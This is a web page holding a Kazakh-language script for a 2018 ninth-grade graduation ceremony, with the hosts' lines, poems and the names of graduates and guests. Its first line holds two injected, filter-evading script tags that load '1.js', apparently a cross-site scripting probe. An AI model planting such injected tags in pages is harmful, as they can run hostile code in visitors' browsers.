<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.06.2018

Жұлдызды

түлек-2018 мектеп бітіру кешінің сценариі

 

1-Жүргізуші:

Армысыздар құрметті қонақтар, ұлағатты ұстаздар, ардақты

ата-аналар және мектеп бітіруші түлектер!

1-Жүргізуші

Бүгінгі «Жұлдызды түлек-2018!» атты  мектеп бітіру кешіне қош келдіңіздер.

Кешімізді  бастамас

бұрын  бүгінгі  мектеп бітіру кеші мерекесіне арқау болып

отырған   9-сынып түлектерін ортаға

шақырамыз!

                               

9-сынып  түлектері:

Топалов Кенжебек

Тлесова Кенжегуль

Шуеншалин Алишер

Баянды Әділ

Телегин Муслим

 

1-Жүргізуші

Ал енді ортаға бүгінгі түлектеріміздің сынып жетекшісін

шақырсақ: 

9-сынып жетекшісі: 

Амангелдин Ернұр Жұмаділұлы

 

1-Жүргізуші

Бүгін қандай шаттық толы кеш еді,

Көңіл шіркін, тасып – толып өседі.

Ұл кешегі жігіт болып қалыпты – ау,

Бойжетіпті бантикті қыз кешегі.

 

1-Жүргізуші

Жүздеріңнен көрем шаттық арайын,

Болсын солай әрбір күнің, әр айың.

Тойларыңыз құтты болсын ата-ана,

Тойларыңыз құтты болсын ағайын!

 

 

1-Жүргізуші

Мектеп қой Еліміздің қаны, жаны.

Мектептен басталады бәрі – бәрі

Бүгінгі салтанатты кешімізде

Шырқалсын Қазақстан әнұраны.

 

 

 

1-Жүргізуші

Бүгінгі «Жұлдызды  түлек - 2018» атты мерекелік кешке келіп

отырған қонақтармен таныстырып өтейік.

1. Ауылымыздың әкімі:  ҚАДЫРОВ Жомарт

Болатұлы

2. ........................................................................................................

3. Мектеп директоры:   Амиргазина Толқын Мұқатқызы

1-Жүргізуші

Бүгін ұшқалы отырған түлектерді құттықтау үшін алғашқы

сөз кезегін  ауылымыздың әкімі   Қадыров Жомарт Болатұлына береміз !

 

1-Жүргізуші

Әр адамның өзінің жұлдызды сәті болады демекші, сол сәт

өмірдің ең керемет көптен күткен кезін меңзеп тұрғандай.

Шын мәнінде Әр пенденің өмірі - жұлдыздар өмірімен

пара-пар. Біреулері жарқырап тұрса, біреулері бір қалыпта

тұрады. Ал

сол жарқыл жеке тұлғаның жарқырауы іспеттес. Сондықтан

бүгінгі

алтын ұя мектебінен ұшқалы отырған түлектерімізді

«Жұлдызды түлек

– 2018» деп атасақ артық болмас.

 

1-Жүргізуші

Өрендер кетті, сендерден енді балалық,

Тұрсыңдар міне, болашақ күнге жол ашып.

Кетігін елдің жетілдірер бол азамат,

Бір кірпіш болып дүниеге мына қаланып.

9  жыл оқып,

білімің түсті қорлана

Аттестат алғалы тұрсың мектеп деген ордада.

Аттестат деген – азаматтық куәсі,

Аттестат деген - өмірге берген жолдама.

дей келе көптен күткен қуанышты кезең, 9 жыл төккен

теріңнің жемісі,

9 жыл бойы алған біліміңнің белгісі Аттестат алу кезеңі

келгендей. Дей келе түлектерге аттестат тапсыру салтанатты рәсімі  мектеп директоры  Толқын Мұқатқызына беріледі

 

1-Жүргізуші

Ата-ана тәрбиелеп балапаның,

Әлдилеп, аялаған алақаның,

Болашақта бақ тілеп тұрасыңдар,

Ойлауменен алдағы бала қамын – дей отырып сөз кезегі жас

түлектердің ата-аналары атынан   .....................................................................................................................беріледі.

2-Жүргізуші

Ұрпақпен өмір жолы жалғанады,

Көңілді күндер тусын алдан әлі

Ән-шашу әсем бимен, түрлі өнер,

Бүгінгі күн сіздерге арналады

 

Дей келе түлектердің сынып жетекшісі Ернұр

Жұмаділұлы  өзінің ыстық лебіздерін  әсем әнмен жеткізгісі келіп тұр. Ендеше

кезекті әсем әнге береміз.

 

1-жүргізуші

Кір шалмасын жаңа ашылған көңілдерің

Ақтаңдар мектеп ұстаз сенімдерін

11 жыл білім алған, сусындаған

Мектебіңмен қош айтысар келді кезің.

1-жүргізуші

Құрметті түлектер аңсаған армандарыңа жетуде

қанаттарың талмасын.

2-жүргізуші

Жолдарың әрқашан ашық болсын!

Құрметті халайық 

осымен   аттестат алу салтанатты

рәсімін  жабық деп жариялаймыз!  Қош сау болыңыздар!

Просмотров: 945

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу